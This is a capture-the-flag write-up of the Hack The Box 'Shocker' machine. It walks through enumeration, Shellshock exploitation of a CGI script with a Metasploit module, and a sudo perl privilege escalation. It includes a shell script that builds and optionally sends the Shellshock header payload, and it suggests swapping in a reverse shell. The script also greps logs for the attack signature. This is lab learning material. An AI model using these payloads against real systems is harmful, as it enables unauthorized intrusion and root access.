Hackthebox Shocker Writeup



Shocker is an easy machine from Hack The Box. Most of the work is enumeration and then picking the right exploit; privilege escalation is trivial.

Steps involved

1-Port scan
2-Directory enumeration
3-Checking the request
4-Exploitation through Metasploit
5-Privilege escalation

Commands involved

1-nmap -sC -sV -O -v -oV
2-dirb -X .sh
3-curl -vvv
4-use exploit/multi/http/apache_mod_cgi_bash_env_exec
5-msf exploit(apache_mod_cgi_bash_env_exec) > set rhost
6-msf exploit(apache_mod_cgi_bash_env_exec) > set lhost
7-msf exploit(apache_mod_cgi_bash_env_exec) > set targeturi /cgi-bin/user.sh
8-msf exploit(apache_mod_cgi_bash_env_exec) > run
9-sudo perl -e 'exec "/bin/sh"'

Port Scan

Nmap 7.70 scan initiated Tue Apr 21 07:52:11 2020 as: nmap -sC -sV -O -v -oV
Increasing send delay for from 0 to 5 due to 231 out of 769 dropped probes since last increase.
Nmap scan report for
Host is up (0.28s latency).
Not shown: 998 closed ports
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
| http-methods:
|_ Supported Methods: POST OPTIONS GET HEAD
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
2222/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 c4:f8:ad:e8:f8:04:77:de:cf:15:0d:63:0a:18:7e:49 (RSA)
| 256 22:8f:b1:97:bf:0f:17:08:fc:7e:2c:8f:e9:77:3a:48 (ECDSA)
|_ 256 e6:ac:27:a3:b5:a9:f1:12:3c:34:a5:5d:5b:eb:3d:e9 (ED25519)
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
Uptime guess: 202.073 days (since Wed Oct 2 06:08:48 2019)
Network Distance: 2 hops
TCP Sequence Prediction: Difficulty=259 (Good luck!)
IP ID Sequence Generation: All zeros
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done at Tue Apr 21 07:53:21 2020 -- 1 IP address (1 host up) scanned in 71.12 seconds

Only two services: Apache 2.4.18 on port 80 and OpenSSH 7.2p2 on the non-standard port 2222. With nothing to go on for SSH, let's visit the website.


Nothing useful in the page source, just a heading and an image:

<!DOCTYPE html>
<html>
<body>
<h2>Don't Bug Me!</h2>
<img src="bug.jpg" alt="bug" style="width:450px;height:350px;">
</body>
</html>

Directory enumeration


Found /cgi-bin.

Requesting the directory itself returns 404 (no directory listing), so the scripts inside have to be guessed. CGI scripts on a Linux box are commonly shell scripts, so run dirb again against /cgi-bin with the .sh extension:

root@nagendra:~/Desktop/htb/shocker# dirb -X .sh

DIRB v2.22
By The Dark Raver
START_TIME: Tue Apr 21 08:41:43 2020
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
EXTENSIONS_LIST: (.sh) | (.sh) [NUM = 1]

---- Scanning URL: ----

It found user.sh.

Curling it returns a plain-text response:

root@nagendra:~/Desktop/htb/shocker# curl
Content-Type: text/plain
Just an uptime test script
08:11:17 up 16 min, 0 users, load average: 0.00, 0.00, 0.00

Checking the request

Let's look at the full exchange with curl -vvv. The response carries a Content-Type: text/plain header followed by the output of uptime, i.e. Apache mod_cgi is executing user.sh as a shell script on every request.

curl -vvv

The machine name is the hint: Shellshock (CVE-2014-6271). Affected versions of bash execute any commands appended after a function definition stored in an environment variable, and mod_cgi exports request headers such as User-Agent into the script's environment as HTTP_USER_AGENT. A crafted header therefore reaches a vulnerable bash before user.sh even starts.

Exploitation through Metasploit

Metasploit has a module for exactly this: exploit/multi/http/apache_mod_cgi_bash_env_exec. Set rhost to the target, lhost to your own address and targeturi to /cgi-bin/user.sh, then run.

Using Metasploit

The module returns a meterpreter session as the user shelly, which is enough for the user flag.
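The Metasploit module is a convenience; the request it sends can be built by hand. The script below is an added example written for this writeup, not code from the original post or from the Metasploit project. It checks whether the local bash is itself vulnerable, builds the User-Agent value that mod_cgi will hand to bash (including the "echo;" needed to terminate the CGI headers), prints or, with RUN_PROBE=1, runs the equivalent curl command, and greps a few access-log lines for the Shellshock signature. The hostname target.lab and the sample log lines are assumptions; the /cgi-bin/user.sh path is the one found above.

```shell
#!/bin/sh
# Added example, not from the original writeup: manual Shellshock (CVE-2014-6271)
# probe doing by hand what exploit/multi/http/apache_mod_cgi_bash_env_exec does.
# TARGET (default target.lab) and the sample log lines below are assumptions.

# 1. Local self-check. A vulnerable bash keeps parsing after the function body
#    in an exported variable and runs the trailing "echo VULNERABLE" at startup;
#    a patched bash refuses the import and only prints "ok".
shellshock_local_check() {
    command -v bash >/dev/null 2>&1 || { echo "no bash"; return; }
    out=$(env x='() { :; }; echo VULNERABLE' bash -c 'echo ok' 2>/dev/null)
    case "$out" in
        *VULNERABLE*) echo "vulnerable" ;;
        *)            echo "patched" ;;
    esac
}

# 2. The header value mod_cgi exports as HTTP_USER_AGENT. "echo;" emits the
#    blank line that ends the CGI headers; without it Apache answers 500 and the
#    command output never reaches the client. $1 must not contain single quotes.
shellshock_header() {
    printf "() { :; }; echo; /bin/bash -c '%s'" "$1"
}

# 3. Full curl command line. User-Agent is the usual carrier, but any header
#    mod_cgi exports (Referer, Cookie, ...) reaches bash the same way.
#    $1 = URL of the CGI script, $2 = command to run on the target.
shellshock_curl_cmd() {
    printf 'curl -s -H "User-Agent: %s" "%s"\n' "$(shellshock_header "$2")" "$1"
}

# 4. Detection: a header starting with "() {" is the Shellshock signature.
#    These Apache access-log lines are constructed for the example.
sample_log() {
    cat <<'EOF'
192.0.2.10 - - [21/Apr/2020:08:11:17 +0000] "GET /cgi-bin/user.sh HTTP/1.1" 200 88 "-" "curl/7.68.0"
192.0.2.10 - - [21/Apr/2020:08:12:03 +0000] "GET /cgi-bin/user.sh HTTP/1.1" 200 16 "-" "() { :; }; echo; /bin/bash -c 'id'"
192.0.2.11 - - [21/Apr/2020:08:12:09 +0000] "GET /index.html HTTP/1.1" 200 137 "-" "Mozilla/5.0"
EOF
}

# Reads log lines on stdin and prints how many carry the signature.
count_shellshock_hits() {
    grep -c -E '\(\) *\{' || true
}

# Real run against a lab box: RUN_PROBE=1 TARGET=host sh shellshock.sh 'id'
if [ -n "${RUN_PROBE:-}" ]; then
    echo "local bash: $(shellshock_local_check)"
    eval "$(shellshock_curl_cmd "http://${TARGET:-target.lab}/cgi-bin/user.sh" "${1:-id}")"
fi
```

Swap the id for a reverse shell one-liner pointed at your listener and you have the same foothold the module gives, minus meterpreter. The log grep is the defensive counterpart: the same "() {" prefix that makes the probe work is what a WAF rule or log search keys on.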


Privilege escalation

Privilege escalation is easy: sudo -l shows that shelly can run /usr/bin/perl as root with no password, and perl can exec any binary, so that is a root shell. Note the first attempt below fails because without -e perl treats the argument as a script filename; -e runs it as code.

meterpreter > shell
Process 1538 created.
Channel 2 created.
sudo -l
Matching Defaults entries for shelly on Shocker:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User shelly may run the following commands on Shocker:
(root) NOPASSWD: /usr/bin/perl
sudo perl 'exec "/bin/sh"'
Can't open perl script "exec "/bin/sh"": No such file or directory
sudo perl -e 'exec "/bin/sh"'
cat /root/root.txt
